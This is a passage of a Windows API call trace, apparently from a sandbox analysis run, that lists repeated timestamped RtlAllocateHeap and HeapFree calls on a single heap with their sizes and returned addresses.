[0236.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0236.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0236.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0236.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0236.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0236.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0236.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0236.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0236.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0236.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0236.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0236.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0236.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0236.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0236.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0236.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0236.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0236.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0236.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0236.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0236.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0236.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0236.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0236.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0236.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0236.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0236.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0236.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0236.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0236.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0236.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 